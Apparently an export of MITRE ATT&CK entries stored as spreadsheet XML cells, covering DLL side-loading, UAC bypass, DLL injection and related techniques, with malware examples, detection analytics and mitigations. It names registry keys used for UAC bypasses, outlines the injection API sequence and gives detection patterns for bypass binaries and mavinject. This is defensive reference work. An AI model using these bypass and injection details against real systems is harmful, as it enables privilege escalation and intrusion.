[Ecipekac](https://attack.mitre.org/software/S0624) can abuse the legitimate application policytool.exe to load a malicious DLL.(Citation: Securelist APT10 March 2021)
Egregor
[Egregor](https://attack.mitre.org/software/S0554) has used DLL side-loading to execute its payload.(Citation: Cyble Egregor Oct 2020) 
FinFisher
[FinFisher](https://attack.mitre.org/software/S0182) uses DLL side-loading to load malicious programs.(Citation: FinFisher Citation)(Citation: Microsoft FinFisher March 2018)
Goopy
[Goopy](https://attack.mitre.org/software/S0477) has the ability to side-load malicious DLLs with legitimate applications from Kaspersky, Microsoft, and Google.(Citation: Cybereason Cobalt Kitty 2017)
HTTPBrowser
[HTTPBrowser](https://attack.mitre.org/software/S0070) has used DLL side-loading.(Citation: Dell TG-3390)
HyperBro
[HyperBro](https://attack.mitre.org/software/S0398) has used a legitimate application to sideload a DLL to decrypt, decompress, and run a payload.(Citation: Unit42 Emissary Panda May 2019)(Citation: Trend Micro Iron Tiger April 2021)
Javali
[Javali](https://attack.mitre.org/software/S0528) can use DLL side-loading to load malicious DLLs into legitimate executables.(Citation: Securelist Brazilian Banking Malware July 2020)
Kerrdown
[Kerrdown](https://attack.mitre.org/software/S0585) can use DLL side-loading to load malicious DLLs.(Citation: Unit 42 KerrDown February 2019)
LookBack
[LookBack](https://attack.mitre.org/software/S0582) side loads its communications module as a DLL into the &lt;code&gt;libcurl.dll&lt;/code&gt; loader.(Citation: Proofpoint LookBack Malware Aug 2019)
Metamorfo
[Metamorfo](https://attack.mitre.org/software/S0455) has side-loaded its malicious DLL file.(Citation: Medium Metamorfo Apr 2020)(Citation: FireEye Metamorfo Apr 2018)(Citation: ESET Casbaneiro Oct 2019) 
Nebulae
[Nebulae](https://attack.mitre.org/software/S0630) can use DLL side-loading to gain execution.(Citation: Bitdefender Naikon April 2021)
Pandora
[Pandora](https://attack.mitre.org/software/S0664) can use DLL side-loading to execute malicious payloads.(Citation: Trend Micro Iron Tiger April 2021)
PlugX
[PlugX](https://attack.mitre.org/software/S0013) has used DLL side-loading to evade anti-virus.(Citation: FireEye Clandestine Fox Part 2)(Citation: Dell TG-3390)(Citation: Stewart 2014)(Citation: PWC Cloud Hopper Technical Annex April 2017)(Citation: Palo Alto PlugX June 2017)(Citation: Trend Micro DRBControl February 2020)(Citation: Profero APT27 December 2020)
PowGoop
[PowGoop](https://attack.mitre.org/software/S1046) can side-load `Goopdate.dll` into `GoogleUpdate.exe`.(Citation: DHS CISA AA22-055A MuddyWater February 2022)(Citation: CYBERCOM Iranian Intel Cyber January 2022)
QakBot
[QakBot](https://attack.mitre.org/software/S0650) has the ability to use DLL side-loading for execution.(Citation: Deep Instinct Black Basta August 2022)
RCSession
[RCSession](https://attack.mitre.org/software/S0662) can be installed via DLL side-loading.(Citation: Secureworks BRONZE PRESIDENT December 2019)(Citation: Trend Micro DRBControl February 2020)(Citation: Profero APT27 December 2020)
RainyDay
[RainyDay](https://attack.mitre.org/software/S0629) can use side-loading to run malicious executables.(Citation: Bitdefender Naikon April 2021)
Sakula
[Sakula](https://attack.mitre.org/software/S0074) uses DLL side-loading, typically using a digitally signed sample of Kaspersky Anti-Virus (AV) 6.0 for Windows Workstations or McAfee's Outlook Scan About Box to load malicious DLL files.(Citation: Dell Sakula)
SysUpdate
[SysUpdate](https://attack.mitre.org/software/S0663) can load DLLs through vulnerable legitimate executables.(Citation: Trend Micro Iron Tiger April 2021)
T9000
During the [T9000](https://attack.mitre.org/software/S0098) installation process, it drops a copy of the legitimate Microsoft binary igfxtray.exe. The executable contains a side-loading weakness which is used to load a portion of the malware.(Citation: Palo Alto T9000 Feb 2016)
Waterbear
[Waterbear](https://attack.mitre.org/software/S0579) has used DLL side loading to import and load a malicious DLL loader.(Citation: Trend Micro Waterbear December 2019) 
Wingbird
[Wingbird](https://attack.mitre.org/software/S0176) side loads a malicious file, sspisrv.dll, in part of a spoofed lssas.exe service.(Citation: Microsoft SIR Vol 21)(Citation: Microsoft Wingbird Nov 2017)
ZeroT
[ZeroT](https://attack.mitre.org/software/S0230) has used DLL side-loading to load malicious payloads.(Citation: Proofpoint TA459 April 2017)(Citation: Proofpoint ZeroT Feb 2017)
gh0st RAT
A [gh0st RAT](https://attack.mitre.org/software/S0032) variant has used DLL side-loading.(Citation: Arbor Musical Chairs Feb 2018)
metaMain
[metaMain](https://attack.mitre.org/software/S1059) can support an HKCMD sideloading start method.(Citation: SentinelLabs Metador Technical Appendix Sept 2022)
</t>
  </si>
  <si>
    <t xml:space="preserve">File Creation
Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Also,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File Modification
Monitor for changes made to files that may execute their own malicious payloads by hijacking vulnerable file path references.
Process Creation
Monitor for newly executed processes that may execute their own malicious payloads by hijacking vulnerable file path references.
Audit
Find and eliminate path interception weaknesses in program configuration files, scripts, the PATH environment variable, services, and in shortcuts by surrounding PATH variables with quotation marks when functions allow for them. Be aware of the search order Windows uses for executing or loading binaries and use fully qualified paths wherever appropriate.
Clean up old Windows Registry keys when software is uninstalled to avoid keys with no associated legitimate binaries. Periodically search for and correct or report path interception weaknesses on systems that may have been introduced using custom or available tools that report software using insecure path configurations.(Citation: Microsoft CreateProcess)(Citation: Microsoft Dynamic-Link Library Security)(Citation: Vulnerability and Exploit Detector)
Execution Prevention
Adversaries will likely need to place new binaries in locations to be executed through this weakness. Identify and block potentially malicious software executed path interception by using application control tools, like Windows Defender Application Control, AppLocker, or Software Restriction Policies where appropriate.(Citation: SANS Application Whitelisting)(Citation: Microsoft Windows Defender Application Control)(Citation: Windows Commands JPCERT)(Citation: NSA MS AppLocker)(Citation: Microsoft Application Lockdown)(Citation: Microsoft Using Software Restriction )
Restrict File and Directory Permissions
Ensure that proper permissions and directory access control are set to deny users the ability to write files to the top-level directory &lt;code&gt;C:&lt;/code&gt; and system directories, such as &lt;code&gt;C:\Windows\&lt;/code&gt;, to reduce places where malicious files could be placed for execution. Require that all executables be placed in write-protected directories.
Empire
[Empire](https://attack.mitre.org/software/S0363) contains modules that can discover and exploit unquoted path vulnerabilities.(Citation: Github PowerShell Empire)
PowerSploit
[PowerSploit](https://attack.mitre.org/software/S0194) contains a collection of Privesc-PowerUp modules that can discover and exploit unquoted path vulnerabilities.(Citation: GitHub PowerSploit May 2012)(Citation: PowerSploit Documentation)
</t>
  </si>
  <si>
    <t xml:space="preserve">OS API Execution
Monitor for API calls related to enumerating and manipulating EWM such as GetWindowLong (Citation: Microsoft GetWindowLong function) and SetWindowLong (Citation: Microsoft SetWindowLong function). Malware associated with this technique have also used SendNotifyMessage (Citation: Microsoft SendNotifyMessage function) to trigger the associated window procedure and eventual malicious injection. (Citation: Elastic Process Injection July 2017)
Behavior Prevention on Endpoint
Some endpoint security solutions can be configured to block some types of process injection based on common sequences of behavior that occur during the injection process. 
Epic
[Epic](https://attack.mitre.org/software/S0091) has overwritten the function pointer in the extra window memory of Explorer's Shell_TrayWnd in order to execute malicious code in the context of the explorer.exe process.(Citation: ESET Recon Snake Nest)
Power Loader
[Power Loader](https://attack.mitre.org/software/S0177) overwrites Explorer’s Shell_TrayWnd extra window memory to redirect execution to a NTDLL function that is abused to assemble and execute a return-oriented programming (ROP) chain and create a malicious thread within Explorer.exe.(Citation: MalwareTech Power Loader Aug 2013)(Citation: WeLiveSecurity Gapz and Redyms Mar 2013)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments that may bypass UAC mechanisms to elevate process privileges on system.
Process Creation
Monitor newly executed processes, such as &lt;code&gt;eventvwr.exe&lt;/code&gt; and &lt;code&gt;sdclt.exe&lt;/code&gt;, that may bypass UAC mechanisms to elevate process privileges on system.
Threat actors often, after compromising a machine, try to disable User Access Control (UAC) to escalate privileges. This is often done by changing the registry key for system policies using “reg.exe”, a legitimate tool provided by Microsoft for modifying the registry via command prompt or scripts. This action interferes with UAC and may enable a threat actor to escalate privileges on the compromised system, thereby allowing further exploitation of the system.
&lt;h4&gt; Analytic 1 : UAC Bypass &lt;/h4&gt;
&lt;code&gt;possible_uac_bypass = filter processes where (
  integrity_level == "High" and
  (parent_image_path == "c:\windows\system32\fodhelper.exe") or
  (command_line == "*.exe\"*cleanmgr.exe /autoclean*") or
  (image_path == "c:\program files\windows media player\osk.exe") or
  (parent_image_path == "c:\windows\system32\slui.exe") or
  (parent_command_line == '"c:\windows\system32\dism.exe"*""*.xml"' and image_path != "c:\users\*\appdata\local\temp\*\dismhost.exe") or
  (command_line == '"c:\windows\system32\wusa.exe"*/quiet*' and user != "NOT_TRANSLATED" and current_working_directory == "c:\windows\system32\" and parent_image_path != "c:\windows\explorer.exe") or
  (parent_image_path == "c:\windows\*dccw.exe" and image_path != "c:\windows\system32\cttune.exe")) &lt;/code&gt;
&lt;h4&gt; Analytic 2 : Disable UAC &lt;/h4&gt;
&lt;code&gt;cmd_processes = filter processes where (
                (parent_image = "C:\\Windows\\System32\\cmd.exe") AND (command_line = "reg.exe%HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System%REG_DWORD /d 0%")) &lt;/code&gt;
Process Metadata
Monitor contextual data about a running process, which may include information such as environment variables, image name, user/owner that may bypass UAC mechanisms to elevate process privileges on system.
Windows Registry Key Modification
Some UAC bypass methods rely on modifying specific, user-accessible Registry settings. For example:
* The &lt;code&gt;eventvwr.exe&lt;/code&gt; bypass uses the &lt;code&gt;[HKEY_CURRENT_USER]\Software\Classes\mscfile\shell\open\command&lt;/code&gt; Registry key.(Citation: enigma0x3 Fileless UAC Bypass)
* The &lt;code&gt;sdclt.exe&lt;/code&gt; bypass uses the &lt;code&gt;[HKEY_CURRENT_USER]\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe&lt;/code&gt; and &lt;code&gt;[HKEY_CURRENT_USER]\Software\Classes\exefile\shell\runas\command\isolatedCommand&lt;/code&gt; Registry keys.(Citation: enigma0x3 sdclt app paths)(Citation: enigma0x3 sdclt bypass)
Analysts should monitor these Registry settings for unauthorized changes.
UAC Bypass is an interesting technique in that new implementations are regularly found and existing implementations may be fixed (i.e., patched) by Microsoft in new builds of Windows. Therefore, it is important to validate than detections for UAC Bypass are still relevant (i.e., they target non-patched implementations). 
Note: Sysmon Event ID 12 (Registry Key Create/Delete), Sysmon Event ID 13 (Registry Value Set), and Sysmon Event ID 14 (Registry Key and Value Rename) are useful for creating detections around Registry Key Modification in the context of UAC Bypass.
Audit
Check for common UAC bypass weaknesses on Windows systems to be aware of the risk posture and address issues where appropriate.(Citation: Github UACMe)
Privileged Account Management
Remove users from the local administrator group on systems.
Update Software
Consider updating Windows to the latest version and patch level to utilize the latest protective measures against UAC bypass.(Citation: Github UACMe)
User Account Control
Although UAC bypass techniques exist, it is still prudent to use the highest enforcement level for UAC when possible and mitigate bypass opportunities that exist with techniques such as [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001).
Operation Honeybee
During [Operation Honeybee](https://attack.mitre.org/campaigns/C0006), the threat actors used the malicious NTWDBLIB.DLL and `cliconfig.exe` to bypass UAC protections.(Citation: McAfee Honeybee)
APT29
[APT29](https://attack.mitre.org/groups/G0016) has bypassed UAC.(Citation: Mandiant No Easy Breach)
APT37
[APT37](https://attack.mitre.org/groups/G0067) has a function in the initial dropper to bypass Windows UAC in order to execute the next payload with higher privileges.(Citation: Securelist ScarCruft May 2019)
BRONZE BUTLER
[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has used a Windows 10 specific tool and xxmm to bypass UAC for privilege escalation.(Citation: Secureworks BRONZE BUTLER Oct 2017)(Citation: Trend Micro Tick November 2019)
Cobalt Group
[Cobalt Group](https://attack.mitre.org/groups/G0080) has bypassed UAC.(Citation: Group IB Cobalt Aug 2017)
Earth Lusca
[Earth Lusca](https://attack.mitre.org/groups/G1006) has used the Fodhelper UAC bypass technique to gain elevated privileges.(Citation: TrendMicro EarthLusca 2022)
Evilnum
[Evilnum](https://attack.mitre.org/groups/G0120) has used PowerShell to bypass UAC.(Citation: ESET EvilNum July 2020)
MuddyWater
[MuddyWater](https://attack.mitre.org/groups/G0069) uses various techniques to bypass UAC.(Citation: ClearSky MuddyWater Nov 2018)
Patchwork
[Patchwork](https://attack.mitre.org/groups/G0040) bypassed User Access Control (UAC).(Citation: Cymmetria Patchwork)
Threat Group-3390
A [Threat Group-3390](https://attack.mitre.org/groups/G0027) tool can use a public UAC bypass method to elevate privileges.(Citation: Nccgroup Emissary Panda May 2018)
AppleJeus
[AppleJeus](https://attack.mitre.org/software/S0584) has presented the user with a UAC prompt to elevate privileges while installing.(Citation: CISA AppleJeus Feb 2021)
AutoIt backdoor
[AutoIt backdoor](https://attack.mitre.org/software/S0129) attempts to escalate privileges by bypassing User Access Control.(Citation: Forcepoint Monsoon)
Avaddon
[Avaddon](https://attack.mitre.org/software/S0640) bypasses UAC using the CMSTPLUA COM interface.(Citation: Arxiv Avaddon Feb 2021) 
BADHATCH
[BADHATCH](https://attack.mitre.org/software/S1081) can utilize the CMSTPLUA COM interface and the SilentCleanup task to bypass UAC.(Citation: BitDefender BADHATCH Mar 2021) 
Bad Rabbit
[Bad Rabbit](https://attack.mitre.org/software/S0606) has attempted to bypass UAC and gain elevated administrative privileges.(Citation: Secure List Bad Rabbit)
BitPaymer
[BitPaymer](https://attack.mitre.org/software/S0570) can suppress UAC prompts by setting the &lt;code&gt;HKCU\Software\Classes\ms-settings\shell\open\command&lt;/code&gt; registry key on Windows 10 or &lt;code&gt;HKCU\Software\Classes\mscfile\shell\open\command&lt;/code&gt; on Windows 7 and launching the &lt;code&gt;eventvwr.msc&lt;/code&gt; process, which launches [BitPaymer](https://attack.mitre.org/software/S0570) with elevated privileges.(Citation: Crowdstrike Indrik November 2018)
BlackCat
[BlackCat](https://attack.mitre.org/software/S1068) can bypass UAC to escalate privileges.(Citation: Microsoft BlackCat Jun 2022) 
BlackEnergy
[BlackEnergy](https://attack.mitre.org/software/S0089) attempts to bypass default User Access Control (UAC) settings by exploiting a backward-compatibility setting found in Windows 7 and later.(Citation: F-Secure BlackEnergy 2014)
Bumblebee
[Bumblebee](https://attack.mitre.org/software/S1039) has the ability to bypass UAC to deploy post exploitation tools with elevated privileges.(Citation: Cybereason Bumblebee August 2022)
CSPY Downloader
[CSPY Downloader](https://attack.mitre.org/software/S0527) can bypass UAC using the SilentCleanup task to execute the binary with elevated privileges.(Citation: Cybereason Kimsuky November 2020)
Clambling
[Clambling](https://attack.mitre.org/software/S0660) has the ability to bypass UAC using a `passuac.dll` file.(Citation: Trend Micro DRBControl February 2020)(Citation: Talent-Jump Clambling February 2020)
Cobalt Strike
[Cobalt Strike](https://attack.mitre.org/software/S0154) can use a number of known techniques to bypass Windows UAC.(Citation: cobaltstrike manual)(Citation: Cobalt Strike Manual 4.3 November 2020)
Downdelph
[Downdelph](https://attack.mitre.org/software/S0134) bypasses UAC to escalate privileges by using a custom “RedirectEXE” shim database.(Citation: ESET Sednit Part 3)
Empire
[Empire](https://attack.mitre.org/software/S0363) includes various modules to attempt to bypass UAC for escalation of privileges.(Citation: Github PowerShell Empire)
FinFisher
[FinFisher](https://attack.mitre.org/software/S0182) performs UAC bypass.(Citation: FinFisher Citation)(Citation: Microsoft FinFisher March 2018)
Gelsemium
[Gelsemium](https://attack.mitre.org/software/S0666) can bypass UAC to elevate process privileges on a compromised host.(Citation: ESET Gelsemium June 2021)
Grandoreiro
[Grandoreiro](https://attack.mitre.org/software/S0531) can bypass UAC by registering as the default handler for .MSC files.(Citation: ESET Grandoreiro April 2020)
H1N1
[H1N1](https://attack.mitre.org/software/S0132) bypasses user access control by using a DLL hijacking vulnerability in the Windows Update Standalone Installer (wusa.exe).(Citation: Cisco H1N1 Part 2)
InvisiMole
[InvisiMole](https://attack.mitre.org/software/S0260) can use fileless UAC bypass and create an elevated COM object to escalate privileges.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)
KOCTOPUS
[KOCTOPUS](https://attack.mitre.org/software/S0669) will perform UAC bypass either through fodhelper.exe or eventvwr.exe.(Citation: MalwareBytes LazyScripter Feb 2021)
KONNI
[KONNI](https://attack.mitre.org/software/S0356) has bypassed UAC by performing token impersonation as well as an RPC-based method, this included bypassing UAC set to “AlwaysNotify".(Citation: Medium KONNI Jan 2020)(Citation: Malwarebytes Konni Aug 2021)
Koadic
[Koadic](https://attack.mitre.org/software/S0250) has 2 methods for elevating integrity. It can bypass UAC through `eventvwr.exe` and `sdclt.exe`.(Citation: Github Koadic)
Lokibot
[Lokibot](https://attack.mitre.org/software/S0447) has utilized multiple techniques to bypass UAC.(Citation: Talos Lokibot Jan 2021)
PLAINTEE
An older variant of [PLAINTEE](https://attack.mitre.org/software/S0254) performs UAC bypass.(Citation: Rancor Unit42 June 2018)
PipeMon
[PipeMon](https://attack.mitre.org/software/S0501) installer can use UAC bypass techniques to install the payload.(Citation: ESET PipeMon May 2020)
PoshC2
[PoshC2](https://attack.mitre.org/software/S0378) can utilize multiple methods to bypass UAC.(Citation: GitHub PoshC2)
Pupy
[Pupy](https://attack.mitre.org/software/S0192) can bypass Windows UAC through either DLL hijacking, eventvwr, or appPaths.(Citation: GitHub Pupy)
QuasarRAT
[QuasarRAT](https://attack.mitre.org/software/S0262) can generate a UAC pop-up Window to prompt the target user to run a command as the administrator.(Citation: CISA AR18-352A Quasar RAT December 2018)
RCSession
[RCSession](https://attack.mitre.org/software/S0662) can bypass UAC to escalate privileges.(Citation: Trend Micro DRBControl February 2020)
RTM
[RTM](https://attack.mitre.org/software/S0148) can attempt to run the program as admin, then show a fake error message and a legitimate UAC bypass prompt to the user in an attempt to socially engineer the user into escalating privileges.(Citation: ESET RTM Feb 2017)
Ramsay
[Ramsay](https://attack.mitre.org/software/S0458) can use [UACMe](https://attack.mitre.org/software/S0116) for privilege escalation.(Citation: Eset Ramsay May 2020)(Citation: Antiy CERT Ramsay April 2020)	
Remcos
[Remcos](https://attack.mitre.org/software/S0332) has a command for UAC bypassing.(Citation: Fortinet Remcos Feb 2017)
SILENTTRINITY
[SILENTTRINITY](https://attack.mitre.org/software/S0692) contains a number of modules that can bypass UAC, including through Window's Device Manager, Manage Optional Features, and an image hijack on the `.msc` file extension.(Citation: GitHub SILENTTRINITY Modules July 2019)   
Saint Bot
[Saint Bot](https://attack.mitre.org/software/S1018) has attempted to bypass UAC using `fodhelper.exe` to escalate privileges.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )
Sakula
[Sakula](https://attack.mitre.org/software/S0074) contains UAC bypass code for both 32- and 64-bit systems.(Citation: Dell Sakula)
Shamoon
[Shamoon](https://attack.mitre.org/software/S0140) attempts to disable UAC remote restrictions by modifying the Registry.(Citation: Palo Alto Shamoon Nov 2016)
ShimRat
[ShimRat](https://attack.mitre.org/software/S0444) has hijacked the cryptbase.dll within migwiz.exe to escalate privileges. This prevented the User Access Control window from appearing.(Citation: FOX-IT May 2016 Mofang)
UACMe
[UACMe](https://attack.mitre.org/software/S0116) contains many methods for bypassing Windows User Account Control on multiple versions of the operating system.(Citation: Github UACMe)
WarzoneRAT
[WarzoneRAT](https://attack.mitre.org/software/S0670) can use `sdclt.exe` to bypass UAC in Windows 10 to escalate privileges; for older Windows versions [WarzoneRAT](https://attack.mitre.org/software/S0670) can use the IFileOperation exploit to bypass the UAC module.(Citation: Check Point Warzone Feb 2020)(Citation: Uptycs Warzone UAC Bypass November 2020)
WastedLocker
[WastedLocker](https://attack.mitre.org/software/S0612) can perform a UAC bypass if it is not executed with administrator rights or if the infected host runs Windows Vista or later.(Citation: NCC Group WastedLocker June 2020)
Winnti for Windows
[Winnti for Windows](https://attack.mitre.org/software/S0141) can use a variant of the sysprep UAC bypass.(Citation: Novetta Winnti April 2015)
ZeroT
Many [ZeroT](https://attack.mitre.org/software/S0230) samples can perform UAC bypass by using eventvwr.exe to execute a malicious file.(Citation: Proofpoint ZeroT Feb 2017)
</t>
  </si>
  <si>
    <t xml:space="preserve">OS API Execution
Monitoring OS API callbacks for the execution can also be a way to detect this behavior but requires specialized security tooling.
Process Creation
Consider monitoring for &lt;code&gt;/usr/libexec/security_authtrampoline&lt;/code&gt; executions which may indicate that &lt;code&gt;AuthorizationExecuteWithPrivileges&lt;/code&gt; is being executed. MacOS system logs may also indicate when &lt;code&gt;AuthorizationExecuteWithPrivileges&lt;/code&gt; is being called.
Execution Prevention
System settings can prevent applications from running that haven't been downloaded through the Apple Store which may help mitigate some of these issues. Not allowing unsigned applications from being run may also mitigate some risk.
OSX/Shlayer
[OSX/Shlayer](https://attack.mitre.org/software/S0402) can escalate privileges to root by asking the user for credentials.(Citation: Carbon Black Shlayer Feb 2019)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor for execution of utilities, like chmod, and their command-line arguments to look for setuid or setguid bits being set.
File Metadata
Monitor the file system for files that have the setuid or setgid bits set.
File Modification
Monitor for changes made to files that may perform shell escapes or exploit vulnerabilities in an application with the setsuid or setgid bits to get code running in a different user’s context.
Operating System Configuration
Applications with known vulnerabilities or known shell escapes should not have the setuid or setgid bits set to reduce potential damage if an application is compromised. Additionally, the number of programs with setuid or setgid bits set should be minimized across a system.
Exaramel for Linux
[Exaramel for Linux](https://attack.mitre.org/software/S0401) can execute commands with high privileges via a specific binary with setuid functionality.(Citation: ANSSI Sandworm January 2021)
Keydnap
[Keydnap](https://attack.mitre.org/software/S0276) adds the setuid flag to a binary so it can easily elevate in the future.(Citation: OSX Keydnap malware)
</t>
  </si>
  <si>
    <t xml:space="preserve">Module Load
Monitor library load events, especially unusual creation of these binary files followed by loading into processes. Look for libraries that are not recognized or not normally loaded into a process.
OS API Execution
Monitor for malicious usage of system calls, such as ptrace and mmap, that can be used to attach to, manipulate memory, then redirect a processes' execution path. Monitoring for Linux specific calls such as the ptrace system call should not generate large amounts of data due to their specialized nature, and can be a very effective method to detect some of the common process injection methods.(Citation: ArtOfMemoryForensics)(Citation: GNU Acct)(Citation: RHEL auditd)(Citation: Chokepoint preload rootkits)
Behavior Prevention on Endpoint
Some endpoint security solutions can be configured to block some types of process injection based on common sequences of behavior that occur during the injection process. 
</t>
  </si>
  <si>
    <t xml:space="preserve">Active Directory Object Creation
Monitor for newly constructed active directory objects, such as Windows EID 5137.
Active Directory Object Deletion
Monitor for unexpected deletion of an active directory object, such as Windows EID 5141.
Active Directory Object Modification
Monitor for changes made to AD settings for unexpected modifications to user accounts, such as deletions or potentially malicious changes to user attributes (credentials, status, etc.).
Command Execution
Monitor executed commands and arguments for modifications to domain trust settings, such as when a user or application modifies the federation settings on the domain or updates domain authentication from Managed to Federated via ActionTypes &lt;code&gt;Set federation settings on domain&lt;/code&gt; and &lt;code&gt;Set domain authentication&lt;/code&gt;.(Citation: Microsoft - Azure Sentinel ADFSDomainTrustMods)(Citation: Microsoft 365 Defender Solorigate)
Audit
Identify and correct GPO permissions abuse opportunities (ex: GPO modification privileges) using auditing tools such as [BloodHound](https://attack.mitre.org/software/S0521) (version 1.5.1 and later)(Citation: GitHub Bloodhound).
Privileged Account Management
Use least privilege and protect administrative access to the Domain Controller and Active Directory Federation Services (AD FS) server. Do not create service accounts with administrative privileges.
User Account Management
Consider implementing WMI and security filtering to further tailor which users and computers a GPO will apply to.(Citation: Wald0 Guide to GPOs)(Citation: Microsoft WMI Filters)(Citation: Microsoft GPO Security Filtering)
</t>
  </si>
  <si>
    <t xml:space="preserve">File Creation
Monitor for newly constructed files to match an existing service executable, it could be detected and correlated with other suspicious behavior.  
File Modification
Monitor for changes to binaries and service executables that may normally occur during software updates. 
Module Load
Monitor DLL/PE file events, specifically creation of these binary files as well as the loading of DLLs into processes. Look for DLLs that are not recognized or not normally loaded into a process.
Process Creation
Monitor for newly constructed processes to match an existing service executables. 
Service Metadata
Monitor for abnormal process call trees from typical processes and services and for execution of other commands that could relate to Discovery or other adversary techniques. 
Audit
Use auditing tools capable of detecting file system permissions abuse opportunities on systems within an enterprise and correct them. Toolkits like the PowerSploit framework contain PowerUp modules that can be used to explore systems for service file system permissions weaknesses.(Citation: Powersploit)
User Account Control
Turn off UAC's privilege elevation for standard users &lt;code&gt;[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]&lt;/code&gt; to automatically deny elevation requests, add: &lt;code&gt;"ConsentPromptBehaviorUser"=dword:00000000&lt;/code&gt;. Consider enabling installer detection for all users by adding: &lt;code&gt;"EnableInstallerDetection"=dword:00000001&lt;/code&gt;. This will prompt for a password for installation and also log the attempt. To disable installer detection, instead add: &lt;code&gt;"EnableInstallerDetection"=dword:00000000&lt;/code&gt;. This may prevent potential elevation of privileges through exploitation during the process of UAC detecting the installer, but will allow the installation process to continue without being logged.  (Citation: Executable Installers are Vulnerable)
User Account Management
Limit privileges of user accounts and groups so that only authorized administrators can interact with service changes and service binary target path locations. Deny execution from user directories such as file download directories and temp directories where able.
</t>
  </si>
  <si>
    <t xml:space="preserve">Active Directory Object Creation
Monitor for newly constructed active directory objects, such as Windows EID 5137.
Active Directory Object Modification
Monitor for changes made to AD settings for unexpected modifications to domain trust settings, such as when a user or application modifies the federation settings on the domain.
Command Execution
Monitor executed commands and arguments that updates domain authentication from Managed to Federated via ActionTypes &lt;code&gt;Set federation settings on domain&lt;/code&gt; and &lt;code&gt;Set domain authentication&lt;/code&gt;.(Citation: Microsoft - Azure Sentinel ADFSDomainTrustMods) Monitor for PowerShell commands such as: &lt;code&gt;Update-MSOLFederatedDomain –DomainName: "Federated Domain Name"&lt;/code&gt;, or &lt;code&gt;Update-MSOLFederatedDomain –DomainName: "Federated Domain Name" –supportmultipledomain&lt;/code&gt;.(Citation: Microsoft - Update or Repair Federated domain)
Privileged Account Management
Use the principal of least privilege and protect administrative access to domain trusts.
SolarWinds Compromise
During the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024), [APT29](https://attack.mitre.org/groups/G0016) changed domain federation trust settings using Azure AD administrative permissions to configure the domain to accept authorization tokens signed by their own SAML signing certificate.(Citation: Secureworks IRON RITUAL Profile)(Citation: Microsoft 365 Defender Solorigate)
AADInternals
[AADInternals](https://attack.mitre.org/software/S0677) can create a backdoor by converting a domain to a federated domain which will be able to authenticate any user across the tenant. [AADInternals](https://attack.mitre.org/software/S0677) can also modify DesktopSSO information.(Citation: AADInternals Documentation)(Citation: Azure AD Federation Vulnerability)
</t>
  </si>
  <si>
    <t xml:space="preserve">Module Load
Monitor DLL/PE file events, specifically creation of these binary files as well as the loading of DLLs into processes. Look for DLLs that are not recognized or not normally loaded into a process. Sysmon Event ID 7 (Image loaded) can be used to monitor the loading of DLLs into processes. This is a particularly noisy event and can generate a large volume of data, so we recommend baselining and filtering out any known benign processes and module loads to help reduce the number of events that are produced.
OS API Execution
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&lt;code&gt;CreateRemoteThread&lt;/code&gt; and those that can be used to modify memory within another process, such as &lt;code&gt;VirtualAllocEx&lt;/code&gt;/&lt;code&gt;WriteProcessMemory&lt;/code&gt;, may be used for this technique.(Citation: Elastic Process Injection July 2017)
Search for remote thread creations that start at LoadLibraryA or LoadLibraryW. Depending on the tool, it may provide additional information about the DLL string that is an argument to the function. If there is any security software that legitimately injects DLLs, it must be carefully whitelisted.
Microsoft Windows allows for processes to remotely create threads within other processes of the same privilege level. This functionality is provided via the Windows API CreateRemoteThread. Both Windows and third-party software use this ability for legitimate purposes. For example, the Windows process csrss.exe creates threads in programs to send signals to registered callback routines. Both adversaries and host-based security software use this functionality to inject DLLs, but for very different purposes. An adversary is likely to inject into a program to evade defenses or bypass User Account Control, but a security program might do this to gain increased monitoring of API calls. One of the most common methods of DLL Injection is through the Windows API LoadLibrary.
- Allocate memory in the target program with VirtualAllocEx
- Write the name of the DLL to inject into this program with WriteProcessMemory
- Create a new thread and set its entry point to LoadLibrary using the API CreateRemoteThread.
This behavior can be detected by looking for thread creations across processes, and resolving the entry point to determine the function name. If the function is LoadLibraryA or LoadLibraryW, then the intent of the remote thread is clearly to inject a DLL. When this is the case, the source process must be examined so that it can be ignored when it is both expected and a trusted process.
&lt;h4&gt;Analytic 1 - DLL Injection via Load Library &lt;/h4&gt;
&lt;code&gt;remote_thread = filter (start_function == "LoadLibraryA" or start_function == "LoadLibraryW")
remote_thread = filter (src_image_path != "C:\Path\To\TrustedProgram.exe")&lt;/code&gt;
Process Access
Monitor for process being viewed that may inject dynamic-link libraries (DLLs) into processes in order to evade process-based defenses as well as possibly elevate privileges.
Process Metadata
Monitor for process memory inconsistencies compared to DLL files on disk by checking memory ranges against a known copy of the legitimate module.(Citation: Hiding Malicious Code with Module Stomping)
Process Modification
Monitor for changes made to processes that may inject dynamic-link libraries (DLLs) into processes in order to evade process-based defenses as well as possibly elevate privileges. Injecting a malicious DLL into a process is a common adversary TTP. Although the ways of doing this are numerous, mavinject.exe is a commonly used tool for doing so because it roles up many of the necessary steps into one, and is available within Windows. Attackers may rename the executable, so we also use the common argument “INJECTRUNNING” as a related signature here. Whitelisting certain applications may be necessary to reduce noise for this analytic.
&lt;h4&gt;Analytic 1 - DLL Injection with Mavinject &lt;/h4&gt;
&lt;code&gt;mavinject_processes = filter processes where (
  exe = "C:\\Windows\\SysWOW64\\mavinject.exe" OR Image="C:\\Windows\\System32\\mavinject.exe" OR command_line = "*/INJECTRUNNING*"&lt;/code&gt;
Behavior Prevention on Endpoint
Some endpoint security solutions can be configured to block some types of process injection based on common sequences of behavior that occur during the injection process. 
C0015
During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors used a DLL named `D8B3.dll` that was injected into the Winlogon process.(Citation: DFIR Conti Bazar Nov 2021) 
BackdoorDiplomacy
